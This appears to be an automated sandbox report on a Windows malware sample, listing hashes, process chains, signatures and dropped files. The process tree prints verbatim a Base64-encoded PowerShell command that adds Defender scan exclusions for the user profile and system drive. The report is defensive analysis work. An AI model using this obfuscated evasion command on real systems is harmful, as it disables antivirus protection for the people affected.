Analysis
- max time kernel: 144s
- max time network: 48s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 05-05-2022 00:56
Static task: static1
Behavioral task: behavioral1
Sample: File.exe
Resource: win7-20220414-en
General
- Target: File.exe
- Size: 4.0MB
- MD5: f74ccaec9935cca19122478058c39f79
- SHA1: 5dbffbe85764d0bd43a90a1ef8eb8d8c5a540527
- SHA256: 8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a
- SHA512: 2cb3379d4c37b2d74f3ae51a0cc0551eb146e5ff6822b0b76e15c63d9f6bd116ed569a5a72cd8be2c37695bfa5cb9ebdd08e27803a9d19cadcc6315b2ebde6ef
Malware Config
Signatures
- Executes dropped EXE (1 IoCs)
  Processes (PID, process): 2000 [New]344334.exe
- Loads dropped DLL (1 IoCs)
  Processes (PID, process): 976 File.exe
- Drops file in System32 directory (1 IoCs)
  Processes (description, IoC, process): File opened for modification; C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk; powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes (PID, process): 1472 powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description, PID, process): Token: SeDebugPrivilege; 1472; powershell.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes (description, PID, process, target process):
  - PID 976 wrote to memory of 2000; 976; File.exe; [New]344334.exe (4 IoCs)
  - PID 2000 wrote to memory of 628; 2000; [New]344334.exe; cmd.exe (3 IoCs)
  - PID 628 wrote to memory of 1472; 628; cmd.exe; powershell.exe (3 IoCs)
Processes
- C:\Users\Admin\AppData\Local\Temp\File.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\File.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
- C:\Users\Admin\AppData\Roaming\[New]344334.exe (depth 2)
  Command line: C:\Users\Admin\AppData\Roaming\[New]344334.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
- C:\Windows\System32\cmd.exe (depth 3)
  Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
  - Suspicious use of WriteProcessMemory
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
  Command line: powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Roaming\[New]344334.exe
  Filesize: 613.8MB
  MD5: 1ed195c5c4e80c1501b9658ca8a9cac8
  SHA1: befd965d451fb7464d110c7ba9db3e753b03e477
  SHA256: ad5e400711094e4cc806a761cbb25b20364596cbacdbc2ddf8c6feb53e4039b5
  SHA512: a1a4a4e2ef7d3424f461d33755bb8d761e63d76ba3fa8aa27e667a90bab3692bf6636dd0c7e5977d6776202ea0fa9a5c2501ad2758e03b6202dffa6192635e26
- C:\Users\Admin\AppData\Roaming\[New]344334.exe
  Filesize: 633.3MB
  MD5: a8cf820149a81d7b85a64ca72d7fbbcc
  SHA1: 38f0d3ecdd7f05e1bd9097da7576458ebfec0e28
  SHA256: 141534dd65409e1fb92900c68f37f2641c87baee47be940b8e880366ce0e9a8f
  SHA512: cdfd06d48b76602210ab3327072587053b3ace332e744de467cef5a52e7529831b81bbcf1c2d62279dca22c3d6f8fe19d59a947a2be716289990dc533c7a9312
- \Users\Admin\AppData\Roaming\[New]344334.exe
  Filesize: 665.9MB
  MD5: 5ab8f145708b1bf7f408243921664a2e
  SHA1: 45d1d852c9770a5005c93a84565c16ceb1fd567a
  SHA256: fa4fee19c6648895a0b5caef6becd093c3ea365ee23edb1925eb1d870fcf92f0
  SHA512: f1a40a4afa62864d7d04179a8dec7f9320577cb31c23b88e837d8ec7a6ddcf7be658ea0d7bc6d1a29958c88006fc09db12852d05ce88bb9416a063897bd29e48
- memory/628-62-0x0000000000000000-mapping.dmp
- memory/976-54-0x00000000752D1000-0x00000000752D3000-memory.dmp (Filesize: 8KB)
- memory/1472-63-0x0000000000000000-mapping.dmp
- memory/1472-65-0x000007FEECC60000-0x000007FEED683000-memory.dmp (Filesize: 10.1MB)
- memory/1472-67-0x0000000002904000-0x0000000002907000-memory.dmp (Filesize: 12KB)
- memory/1472-66-0x000007FEEC100000-0x000007FEECC5D000-memory.dmp (Filesize: 11.4MB)
- memory/1472-68-0x000000001B8F0000-0x000000001BBEF000-memory.dmp (Filesize: 3.0MB)
- memory/1472-69-0x000000000290B000-0x000000000292A000-memory.dmp (Filesize: 124KB)
- memory/2000-60-0x000000001C9F0000-0x000000001CC22000-memory.dmp (Filesize: 2.2MB)
- memory/2000-61-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp (Filesize: 8KB)
- memory/2000-59-0x000000013F3B0000-0x000000013F5F8000-memory.dmp (Filesize: 2.3MB)
- memory/2000-56-0x0000000000000000-mapping.dmp